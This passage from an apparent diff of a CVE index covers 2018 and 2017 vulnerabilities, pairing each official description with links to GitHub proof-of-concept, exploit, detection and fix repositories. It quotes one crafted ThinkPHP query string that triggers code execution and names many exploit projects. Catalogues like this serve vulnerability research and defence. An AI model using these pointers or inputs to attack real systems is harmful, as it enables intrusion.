metacharacters in the IsAccessPoint element such as the `telnetd` string. + + +- [nahueldsanchez/blogpost_cve-2018-19987-analysis](https://github.com/nahueldsanchez/blogpost_cve-2018-19987-analysis) + +### CVE-2018-20062 (2018-12-11) + +An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string. + + +- [NS-Sp4ce/thinkphp5.XRce](https://github.com/NS-Sp4ce/thinkphp5.XRce) +- [yilin1203/CVE-2018-20062](https://github.com/yilin1203/CVE-2018-20062) + +### CVE-2018-20148 (2018-12-14) + +In WordPress before 4.9.9 and 5.x before 5.0.1, contributors could conduct PHP object injection attacks via crafted metadata in a wp.getMediaItem XMLRPC call. This is caused by mishandling of serialized data at phar:// URLs in the wp_get_attachment_thumb_file function in wp-includes/post.php. + + +- [nth347/CVE-2018-20148_exploit](https://github.com/nth347/CVE-2018-20148_exploit) + +### CVE-2018-20162 (2019-03-17) + +Digi TransPort LR54 4.4.0.26 and possible earlier devices have Improper Input Validation that allows users with 'super' CLI access privileges to bypass a restricted shell and execute arbitrary commands as root. + + +- [stigtsp/CVE-2018-20162-digi-lr54-restricted-shell-escape](https://github.com/stigtsp/CVE-2018-20162-digi-lr54-restricted-shell-escape) + +### CVE-2018-20165 (2019-03-22) + +Cross-site scripting (XSS) vulnerability in OpenText Portal 7.4.4 allows remote attackers to inject arbitrary web script or HTML via the vgnextoid parameter to a menuitem URI. + + +- [hect0rS/Reflected-XSS-on-Opentext-Portal-v7.4.4](https://github.com/hect0rS/Reflected-XSS-on-Opentext-Portal-v7.4.4) + +### CVE-2018-20250 (2019-02-05) + +In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path. + + +- [WyAtu/CVE-2018-20250](https://github.com/WyAtu/CVE-2018-20250) +- [QAX-A-Team/CVE-2018-20250](https://github.com/QAX-A-Team/CVE-2018-20250) +- [nmweizi/CVE-2018-20250-poc-winrar](https://github.com/nmweizi/CVE-2018-20250-poc-winrar) +- [blunden/UNACEV2.DLL-CVE-2018-20250](https://github.com/blunden/UNACEV2.DLL-CVE-2018-20250) +- [easis/CVE-2018-20250-WinRAR-ACE](https://github.com/easis/CVE-2018-20250-WinRAR-ACE) +- [STP5940/CVE-2018-20250](https://github.com/STP5940/CVE-2018-20250) +- [technicaldada/hack-winrar](https://github.com/technicaldada/hack-winrar) +- [Ektoplasma/ezwinrar](https://github.com/Ektoplasma/ezwinrar) +- [arkangel-dev/CVE-2018-20250-WINRAR-ACE-GUI](https://github.com/arkangel-dev/CVE-2018-20250-WINRAR-ACE-GUI) +- [AeolusTF/CVE-2018-20250](https://github.com/AeolusTF/CVE-2018-20250) +- [joydragon/Detect-CVE-2018-20250](https://github.com/joydragon/Detect-CVE-2018-20250) +- [likekabin/CVE-2018-20250](https://github.com/likekabin/CVE-2018-20250) +- [H4xl0r/WinRar_ACE_exploit_CVE-2018-20250](https://github.com/H4xl0r/WinRar_ACE_exploit_CVE-2018-20250) +- [eastmountyxz/CVE-2018-20250-WinRAR](https://github.com/eastmountyxz/CVE-2018-20250-WinRAR) +- [lxg5763/cve-2018-20250](https://github.com/lxg5763/cve-2018-20250) +- [zeronohacker/CVE-2018-20250](https://github.com/zeronohacker/CVE-2018-20250) +- [tzwlhack/CVE-2018-20250](https://github.com/tzwlhack/CVE-2018-20250) +- [tannlh/CVE-2018-20250](https://github.com/tannlh/CVE-2018-20250) +- [LamSonBinh/CVE-2018-20250](https://github.com/LamSonBinh/CVE-2018-20250) + +### CVE-2018-20343 (2020-03-02) + +Multiple buffer overflow vulnerabilities have been found in Ken Silverman Build Engine 1. An attacker could craft a special map file to execute arbitrary code when the map file is loaded. + + +- [Alexandre-Bartel/CVE-2018-20343](https://github.com/Alexandre-Bartel/CVE-2018-20343) + +### CVE-2018-20377 (2018-12-23) + +Orange Livebox 00.96.320S devices allow remote attackers to discover Wi-Fi credentials via /get_getnetworkconf.cgi on port 8080, leading to full control if the admin password equals the Wi-Fi password or has the default admin value. This is related to Firmware 01.11.2017-11:43:44, Boot v0.70.03, Modem 5.4.1.10.1.1A, Hardware 02, and Arcadyan ARV7519RW22-A-L T VR9 1.2. + + +- [zadewg/LIVEBOX-0DAY](https://github.com/zadewg/LIVEBOX-0DAY) + +### CVE-2018-20433 (2018-12-24) + +c3p0 0.9.5.2 allows XXE in extractXmlConfigFromInputStream in com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java during initialization. + + +- [shanika04/cp30_XXE_partial_fix](https://github.com/shanika04/cp30_XXE_partial_fix) + +### CVE-2018-20434 (2019-04-24) + +LibreNMS 1.46 allows remote attackers to execute arbitrary OS commands by using the $_POST['community'] parameter to html/pages/addhost.inc.php during creation of a new device, and then making a /ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost request that triggers html/includes/output/capture.inc.php command mishandling. + + +- [mhaskar/CVE-2018-20434](https://github.com/mhaskar/CVE-2018-20434) + +### CVE-2018-20463 (2018-12-25) + +An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF. + + +- [Henry4E36/CVE-2018-20463](https://github.com/Henry4E36/CVE-2018-20463) + +### CVE-2018-20555 (2019-03-18) + +The Design Chemical Social Network Tabs plugin 1.7.1 for WordPress allows remote attackers to discover Twitter access_token, access_token_secret, consumer_key, and consumer_secret values by reading the dcwp_twitter.php source code. This leads to Twitter account takeover. + + +- [fs0c131y/CVE-2018-20555](https://github.com/fs0c131y/CVE-2018-20555) + +### CVE-2018-20580 (2019-05-03) + +The WSDL import functionality in SmartBear ReadyAPI 2.5.0 and 2.6.0 allows remote attackers to execute arbitrary Java code via a crafted request parameter in a WSDL file. + + +- [gscamelo/CVE-2018-20580](https://github.com/gscamelo/CVE-2018-20580) + +### CVE-2018-20718 (2019-01-15) + +In Pydio before 8.2.2, an attack is possible via PHP Object Injection because a user is allowed to use the $phpserial$a:0:{} syntax to store a preference. An attacker either needs a "public link" of a file, or access to any unprivileged user account for creation of such a link. + + +- [us3r777/CVE-2018-20718](https://github.com/us3r777/CVE-2018-20718) + +### CVE-2018-20966 (2019-08-12) + +The woocommerce-jetpack plugin before 3.8.0 for WordPress has XSS in the Products Per Page feature. + + +- [parzel/CVE-2018-20966](https://github.com/parzel/CVE-2018-20966) + +### CVE-2018-25031 (2022-03-11) + +Swagger UI 4.1.2 and earlier could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions. Note: This was originally claimed to be resolved in 4.1.3. However, third parties have indicated this is not resolved in 4.1.3 and even occurs in that version and possibly others. + + +- [afine-com/CVE-2018-25031](https://github.com/afine-com/CVE-2018-25031) +- [kriso4os/CVE-2018-25031](https://github.com/kriso4os/CVE-2018-25031) +- [rafaelcintralopes/SwaggerUI-CVE-2018-25031](https://github.com/rafaelcintralopes/SwaggerUI-CVE-2018-25031) +- [mathis2001/CVE-2018-25031](https://github.com/mathis2001/CVE-2018-25031) +- [wrkk112/CVE-2018-25031](https://github.com/wrkk112/CVE-2018-25031) +- [LUCASRENAA/CVE-2018-25031](https://github.com/LUCASRENAA/CVE-2018-25031) +- [hev0x/CVE-2018-25031-PoC](https://github.com/hev0x/CVE-2018-25031-PoC) +- [johnlaurance/CVE-2018-25031-test2](https://github.com/johnlaurance/CVE-2018-25031-test2) +- [geozin/POC-CVE-2018-25031](https://github.com/geozin/POC-CVE-2018-25031) +- [h2oa/CVE-2018-25031](https://github.com/h2oa/CVE-2018-25031) +- [natpakun/SSRF-CVE-2018-25031-](https://github.com/natpakun/SSRF-CVE-2018-25031-) +- [KonEch0/CVE-2018-25031-SG](https://github.com/KonEch0/CVE-2018-25031-SG) + +### CVE-2018-25032 (2022-03-25) + +zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches. + + +- [Trinadh465/external_zlib_4.4_CVE-2018-25032](https://github.com/Trinadh465/external_zlib_4.4_CVE-2018-25032) +- [Satheesh575555/external_zlib-1.2.7_CVE-2018-25032](https://github.com/Satheesh575555/external_zlib-1.2.7_CVE-2018-25032) +- [Trinadh465/external_zlib_AOSP10_r33_CVE-2018-25032](https://github.com/Trinadh465/external_zlib_AOSP10_r33_CVE-2018-25032) + +### CVE-2018-25075 (2023-01-15) + +Es wurde eine kritische Schwachstelle in karsany OBridge bis 1.3 entdeckt. Hiervon betroffen ist die Funktion getAllStandaloneProcedureAndFunction der Datei obridge-main/src/main/java/org/obridge/dao/ProcedureDao.java. Durch Manipulation mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Die Komplexität eines Angriffs ist eher hoch. Sie gilt als schwierig auszunutzen. Ein Aktualisieren auf die Version 1.4 vermag dieses Problem zu lösen. Der Patch wird als 52eca4ad05f3c292aed3178b2f58977686ffa376 bezeichnet. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [epicosy/obridge](https://github.com/epicosy/obridge) + +### CVE-2018-1000001 (2018-01-31) + +In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpath() which can be used to write before the destination buffer leading to a buffer underflow and potential code execution. + + +- [0x00-0x00/CVE-2018-1000001](https://github.com/0x00-0x00/CVE-2018-1000001) +- [usernameid0/tools-for-CVE-2018-1000001](https://github.com/usernameid0/tools-for-CVE-2018-1000001) + +### CVE-2018-1000006 (2018-01-24) + +GitHub Electron versions 1.8.2-beta.3 and earlier, 1.7.10 and earlier, 1.6.15 and earlier has a vulnerability in the protocol handler, specifically Electron apps running on Windows 10, 7 or 2008 that register custom protocol handlers can be tricked in arbitrary command execution if the user clicks on a specially crafted URL. This has been fixed in versions 1.8.2-beta.4, 1.7.11, and 1.6.16. + + +- [CHYbeta/CVE-2018-1000006-DEMO](https://github.com/CHYbeta/CVE-2018-1000006-DEMO) + +### CVE-2018-1000030 (2018-02-08) + +Python 2.7.14 is vulnerable to a Heap-Buffer-Overflow as well as a Heap-Use-After-Free. Python versions prior to 2.7.14 may also be vulnerable and it appears that Python 2.7.17 and prior may also be vulnerable however this has not been confirmed. The vulnerability lies when multiply threads are handling large amounts of data. In both cases there is essentially a race condition that occurs. For the Heap-Buffer-Overflow, Thread 2 is creating the size for a buffer, but Thread1 is already writing to the buffer without knowing how much to write. So when a large amount of data is being processed, it is very easy to cause memory corruption using a Heap-Buffer-Overflow. As for the Use-After-Free, Thread3->Malloc->Thread1->Free's->Thread2-Re-uses-Free'd Memory. The PSRT has stated that this is not a security vulnerability due to the fact that the attacker must be able to run code, however in some situations, such as function as a service, this vulnerability can potentially be used by an attacker to violate a trust boundary, as such the DWF feels this issue deserves a CVE. + + +- [tylepr96/CVE-2018-1000030](https://github.com/tylepr96/CVE-2018-1000030) + +### CVE-2018-1000082 (2018-03-13) + +Ajenti version version 2 contains a Cross ite Request Forgery (CSRF) vulnerability in the command execution panel of the tool used to manage the server. that can result in Code execution on the server . This attack appear to be exploitable via Being a CSRF, victim interaction is needed, when the victim access the infected trigger of the CSRF any code that match the victim privledges on the server can be executed.. + + +- [SECFORCE/CVE-2018-1000082-exploit](https://github.com/SECFORCE/CVE-2018-1000082-exploit) + +### CVE-2018-1000117 (2018-03-07) + +Python Software Foundation CPython version From 3.2 until 3.6.4 on Windows contains a Buffer Overflow vulnerability in os.symlink() function on Windows that can result in Arbitrary code execution, likely escalation of privilege. This attack appears to be exploitable via a python script that creates a symlink with an attacker controlled name or location. This vulnerability appears to have been fixed in 3.7.0 and 3.6.5. + + +- [u0pattern/CVE-2018-1000117-Exploit](https://github.com/u0pattern/CVE-2018-1000117-Exploit) + +### CVE-2018-1000134 (2018-03-16) + +UnboundID LDAP SDK version from commit 801111d8b5c732266a5dbd4b3bb0b6c7b94d7afb up to commit 8471904a02438c03965d21367890276bc25fa5a6, where the issue was reported and fixed contains an Incorrect Access Control vulnerability in process function in SimpleBindRequest class doesn't check for empty password when running in synchronous mode. commit with applied fix https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6#diff-f6cb23b459be1ec17df1da33760087fd that can result in Ability to impersonate any valid user. This attack appear to be exploitable via Providing valid username and empty password against servers that do not do additional validation as per https://tools.ietf.org/html/rfc4513#section-5.1.1. This vulnerability appears to have been fixed in after commit 8471904a02438c03965d21367890276bc25fa5a6. + + +- [dragotime/cve-2018-1000134](https://github.com/dragotime/cve-2018-1000134) + +### CVE-2018-1000140 (2018-03-23) + +rsyslog librelp version 1.2.14 and earlier contains a Buffer Overflow vulnerability in the checking of x509 certificates from a peer that can result in Remote code execution. This attack appear to be exploitable a remote attacker that can connect to rsyslog and trigger a stack buffer overflow by sending a specially crafted x509 certificate. + + +- [s0/rsyslog-librelp-CVE-2018-1000140](https://github.com/s0/rsyslog-librelp-CVE-2018-1000140) +- [s0/rsyslog-librelp-CVE-2018-1000140-fixed](https://github.com/s0/rsyslog-librelp-CVE-2018-1000140-fixed) + +### CVE-2018-1000199 (2018-05-24) + +The Linux Kernel version 3.18 contains a dangerous feature vulnerability in modify_user_hw_breakpoint() that can result in crash and possibly memory corruption. This attack appear to be exploitable via local code execution and the ability to use ptrace. This vulnerability appears to have been fixed in git commit f67b15037a7a50c57f72e69a6d59941ad90a0f0f. + + +- [dsfau/CVE-2018-1000199](https://github.com/dsfau/CVE-2018-1000199) + +### CVE-2018-1000224 (2018-08-20) + +Godot Engine version All versions prior to 2.1.5, all 3.0 versions prior to 3.0.6. contains a Signed/unsigned comparison, wrong buffer size chackes, integer overflow, missing padding initialization vulnerability in (De)Serialization functions (core/io/marshalls.cpp) that can result in DoS (packet of death), possible leak of uninitialized memory. This attack appear to be exploitable via A malformed packet is received over the network by a Godot application that uses built-in serialization (e.g. game server, or game client). Could be triggered by multiplayer opponent. This vulnerability appears to have been fixed in 2.1.5, 3.0.6, master branch after commit feaf03421dda0213382b51aff07bd5a96b29487b. + + +- [zann1x/ITS](https://github.com/zann1x/ITS) + +### CVE-2018-1000529 (2018-06-26) + +Grails Fields plugin version 2.2.7 contains a Cross Site Scripting (XSS) vulnerability in Using the display tag that can result in XSS . This vulnerability appears to have been fixed in 2.2.8. + + +- [martinfrancois/CVE-2018-1000529](https://github.com/martinfrancois/CVE-2018-1000529) + +### CVE-2018-1000531 (2018-06-26) + +inversoft prime-jwt version prior to commit abb0d479389a2509f939452a6767dc424bb5e6ba contains a CWE-20 vulnerability in JWTDecoder.decode that can result in an incorrect signature validation of a JWT token. This attack can be exploitable when an attacker crafts a JWT token with a valid header using 'none' as algorithm and a body to requests it be validated. This vulnerability was fixed after commit abb0d479389a2509f939452a6767dc424bb5e6ba. + + +- [realbatuhan/JWT-Bruteforcer](https://github.com/realbatuhan/JWT-Bruteforcer) + +### CVE-2018-1000542 (2018-06-26) + +netbeans-mmd-plugin version <= 1.4.3 contains a XML External Entity (XXE) vulnerability in MMD file import that can result in Possible information disclosure, server-side request forgery, or remote code execution. This attack appear to be exploitable via Specially crafted MMD file. + + +- [forse01/CVE-2018-1000542-NetBeans](https://github.com/forse01/CVE-2018-1000542-NetBeans) + +### CVE-2018-1000802 (2018-09-18) + +Python Software Foundation Python (CPython) version 2.7 contains a CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in shutil module (make_archive function) that can result in Denial of service, Information gain via injection of arbitrary files on the system or entire drive. This attack appear to be exploitable via Passage of unfiltered user input to the function. This vulnerability appears to have been fixed in after commit add531a1e55b0a739b0f42582f1c9747e5649ace. + + +- [tna0y/CVE-2018-1000802-PoC](https://github.com/tna0y/CVE-2018-1000802-PoC) + +### CVE-2018-1000844 (2018-12-20) + +Square Open Source Retrofit version Prior to commit 4a693c5aeeef2be6c7ecf80e7b5ec79f6ab59437 contains a XML External Entity (XXE) vulnerability in JAXB that can result in An attacker could use this to remotely read files from the file system or to perform SSRF.. This vulnerability appears to have been fixed in After commit 4a693c5aeeef2be6c7ecf80e7b5ec79f6ab59437. + + +- [epicosy/Retrofit-1](https://github.com/epicosy/Retrofit-1) + +### CVE-2018-1000861 (2018-12-10) + +A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way. + + +- [1NTheKut/CVE-2019-1003000_RCE-DETECTION](https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION) +- [smokeintheshell/CVE-2018-1000861](https://github.com/smokeintheshell/CVE-2018-1000861) + +### CVE-2018-1002105 (2018-12-05) + +In all Kubernetes versions prior to v1.10.11, v1.11.5, and v1.12.3, incorrect handling of error responses to proxied upgrade requests in the kube-apiserver allowed specially crafted requests to establish a connection through the Kubernetes API server to backend servers, then send arbitrary requests over the same connection directly to the backend, authenticated with the Kubernetes API server's TLS credentials used to establish the backend connection. + + +- [gravitational/cve-2018-1002105](https://github.com/gravitational/cve-2018-1002105) +- [evict/poc_CVE-2018-1002105](https://github.com/evict/poc_CVE-2018-1002105) +- [imlzw/Kubernetes-1.12.3-all-auto-install](https://github.com/imlzw/Kubernetes-1.12.3-all-auto-install) +- [bgeesaman/cve-2018-1002105](https://github.com/bgeesaman/cve-2018-1002105) +- [sh-ubh/CVE-2018-1002105](https://github.com/sh-ubh/CVE-2018-1002105) + +### CVE-2018-1999002 (2018-07-23) + +A arbitrary file read vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in the Stapler web framework's org/kohsuke/stapler/Stapler.java that allows attackers to send crafted HTTP requests returning the contents of any file on the Jenkins master file system that the Jenkins master has access to. + + +- [wetw0rk/Exploit-Development](https://github.com/wetw0rk/Exploit-Development) +- [slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins](https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins) +- [0x6b7966/CVE-2018-1999002](https://github.com/0x6b7966/CVE-2018-1999002) + ## 2017 +### CVE-2017-0005 (2017-03-17) + +The Graphics Device Interface (GDI) in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allows local users to gain privileges via a crafted application, aka "Windows GDI Elevation of Privilege Vulnerability." This vulnerability is different from those described in CVE-2017-0001, CVE-2017-0025, and CVE-2017-0047. + + +- [sheri31/0005poc](https://github.com/sheri31/0005poc) + +### CVE-2017-0037 (2017-02-26) + +Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement function in mshtml.dll, which allows remote attackers to execute arbitrary code via vectors involving a crafted Cascading Style Sheets (CSS) token sequence and crafted JavaScript code that operates on a TH element. + + +- [chattopadhyaykittu/CVE-2017-0037](https://github.com/chattopadhyaykittu/CVE-2017-0037) + +### CVE-2017-0038 (2017-02-20) + +gdi32.dll in Graphics Device Interface (GDI) in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold, 1511, and 1607 allows remote attackers to obtain sensitive information from process heap memory via a crafted EMF file, as demonstrated by an EMR_SETDIBITSTODEVICE record with modified Device Independent Bitmap (DIB) dimensions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-3216, CVE-2016-3219, and/or CVE-2016-3220. + + +- [k0keoyo/CVE-2017-0038-EXP-C-JS](https://github.com/k0keoyo/CVE-2017-0038-EXP-C-JS) + +### CVE-2017-0055 (2017-03-17) + +Microsoft Internet Information Server (IIS) in Windows Vista SP2; Windows Server 2008 SP2 and R2; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to perform cross-site scripting and run script with local user privileges via a crafted request, aka "Microsoft IIS Server XSS Elevation of Privilege Vulnerability." + + +- [NetJBS/CVE-2017-0055-PoC](https://github.com/NetJBS/CVE-2017-0055-PoC) + +### CVE-2017-0065 (2017-03-17) + +Microsoft Edge allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Microsoft Browser Information Disclosure Vulnerability." This vulnerability is different from those described in CVE-2017-0009, CVE-2017-0011, CVE-2017-0017, and CVE-2017-0068. + + +- [Dankirk/cve-2017-0065](https://github.com/Dankirk/cve-2017-0065) + +### CVE-2017-0075 (2017-03-17) + +Hyper-V in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows guest OS users to execute arbitrary code on the host OS via a crafted application, aka "Hyper-V Remote Code Execution Vulnerability." This vulnerability is different from that described in CVE-2017-0109. + + +- [4B5F5F4B/HyperV](https://github.com/4B5F5F4B/HyperV) +- [belyakovvitagmailt/4B5F5F4Bp](https://github.com/belyakovvitagmailt/4B5F5F4Bp) +- [MarkusCarelli1/4B5F5F4Bp](https://github.com/MarkusCarelli1/4B5F5F4Bp) + +### CVE-2017-0089 (2017-03-17) + +Uniscribe in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows remote attackers to execute arbitrary code via a crafted web site, aka "Uniscribe Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0072, CVE-2017-0083, CVE-2017-0084, CVE-2017-0086, CVE-2017-0087, CVE-2017-0088, and CVE-2017-0090. + + +- [rainhawk13/Added-Pentest-Ground-to-vulnerable-websites-for-training](https://github.com/rainhawk13/Added-Pentest-Ground-to-vulnerable-websites-for-training) + +### CVE-2017-0100 (2017-03-17) + +A DCOM object in Helppane.exe in Microsoft Windows 7 SP1; Windows Server 2008 R2; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows local users to gain privileges via a crafted application, aka "Windows HelpPane Elevation of Privilege Vulnerability." + + +- [cssxn/CVE-2017-0100](https://github.com/cssxn/CVE-2017-0100) + +### CVE-2017-0106 (2017-04-12) + +Microsoft Excel 2007 SP3, Microsoft Outlook 2010 SP2, Microsoft Outlook 2013 SP1, and Microsoft Outlook 2016 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted document, aka "Microsoft Office Memory Corruption Vulnerability." + + +- [ryhanson/CVE-2017-0106](https://github.com/ryhanson/CVE-2017-0106) + +### CVE-2017-0108 (2017-03-17) + +The Windows Graphics Component in Microsoft Office 2007 SP3; 2010 SP2; and Word Viewer; Skype for Business 2016; Lync 2013 SP1; Lync 2010; Live Meeting 2007; Silverlight 5; Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; and Windows 7 SP1 allows remote attackers to execute arbitrary code via a crafted web site, aka "Graphics Component Remote Code Execution Vulnerability." This vulnerability is different from that described in CVE-2017-0014. + + +- [homjxi0e/CVE-2017-0108](https://github.com/homjxi0e/CVE-2017-0108) + +### CVE-2017-0143 (2017-03-17) + +The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148. + + +- [valarauco/wannafind](https://github.com/valarauco/wannafind) +- [NatteeSetobol/Etern-blue-Windows-7-Checker](https://github.com/NatteeSetobol/Etern-blue-Windows-7-Checker) +- [n3rdh4x0r/MS17-010_CVE-2017-0143](https://github.com/n3rdh4x0r/MS17-010_CVE-2017-0143) +- [SampatDhakal/Metasploit-Attack-Report](https://github.com/SampatDhakal/Metasploit-Attack-Report) + +### CVE-2017-0144 (2017-03-17) + +The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148. + + +- [peterpt/eternal_scanner](https://github.com/peterpt/eternal_scanner) +- [kimocoder/eternalblue](https://github.com/kimocoder/eternalblue) +- [EEsshq/CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-Execution](https://github.com/EEsshq/CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-Execution) +- [quynhold/Detect-CVE-2017-0144-attack](https://github.com/quynhold/Detect-CVE-2017-0144-attack) +- [ducanh2oo3/Vulnerability-Research-CVE-2017-0144](https://github.com/ducanh2oo3/Vulnerability-Research-CVE-2017-0144) +- [AnugiArrawwala/CVE-Research](https://github.com/AnugiArrawwala/CVE-Research) +- [DenuwanJayasekara/CVE-Exploitation-Reports](https://github.com/DenuwanJayasekara/CVE-Exploitation-Reports) + +### CVE-2017-0145 (2017-03-17) + +The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148. + + +- [MelonSmasher/chef_tissues](https://github.com/MelonSmasher/chef_tissues) + +### CVE-2017-0147 (2017-03-17) + +The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka "Windows SMB Information Disclosure Vulnerability." + + +- [RobertoLeonFR-ES/Exploit-Win32.CVE-2017-0147.A](https://github.com/RobertoLeonFR-ES/Exploit-Win32.CVE-2017-0147.A) + +### CVE-2017-0148 (2017-03-17) + +The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146. + + +- [HakaKali/CVE-2017-0148](https://github.com/HakaKali/CVE-2017-0148) + +### CVE-2017-0199 (2017-04-12) + +Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API." + + +- [ryhanson/CVE-2017-0199](https://github.com/ryhanson/CVE-2017-0199) +- [SyFi/cve-2017-0199](https://github.com/SyFi/cve-2017-0199) +- [bhdresh/CVE-2017-0199](https://github.com/bhdresh/CVE-2017-0199) +- [NotAwful/CVE-2017-0199-Fix](https://github.com/NotAwful/CVE-2017-0199-Fix) +- [haibara3839/CVE-2017-0199-master](https://github.com/haibara3839/CVE-2017-0199-master) +- [Exploit-install/CVE-2017-0199](https://github.com/Exploit-install/CVE-2017-0199) +- [mzakyz666/PoC-CVE-2017-0199](https://github.com/mzakyz666/PoC-CVE-2017-0199) +- [n1shant-sinha/CVE-2017-0199](https://github.com/n1shant-sinha/CVE-2017-0199) +- [kn0wm4d/htattack](https://github.com/kn0wm4d/htattack) +- [joke998/Cve-2017-0199](https://github.com/joke998/Cve-2017-0199) +- [joke998/Cve-2017-0199-](https://github.com/joke998/Cve-2017-0199-) +- [sUbc0ol/Microsoft-Word-CVE-2017-0199-](https://github.com/sUbc0ol/Microsoft-Word-CVE-2017-0199-) +- [viethdgit/CVE-2017-0199](https://github.com/viethdgit/CVE-2017-0199) +- [nicpenning/RTF-Cleaner](https://github.com/nicpenning/RTF-Cleaner) +- [herbiezimmerman/2017-11-17-Maldoc-Using-CVE-2017-0199](https://github.com/herbiezimmerman/2017-11-17-Maldoc-Using-CVE-2017-0199) +- [jacobsoo/RTF-Cleaner](https://github.com/jacobsoo/RTF-Cleaner) +- [likekabin/CVE-2017-0199](https://github.com/likekabin/CVE-2017-0199) +- [stealth-ronin/CVE-2017-0199-PY-KIT](https://github.com/stealth-ronin/CVE-2017-0199-PY-KIT) +- [Phantomlancer123/CVE-2017-0199](https://github.com/Phantomlancer123/CVE-2017-0199) +- [BRAINIAC22/CVE-2017-0199](https://github.com/BRAINIAC22/CVE-2017-0199) +- [Sunqiz/CVE-2017-0199-reprofuction](https://github.com/Sunqiz/CVE-2017-0199-reprofuction) +- [TheCyberWatchers/CVE-2017-0199-v5.0](https://github.com/TheCyberWatchers/CVE-2017-0199-v5.0) +- [kash-123/CVE-2017-0199](https://github.com/kash-123/CVE-2017-0199) + +### CVE-2017-0204 (2017-04-12) + +Microsoft Outlook 2007 SP3, Microsoft Outlook 2010 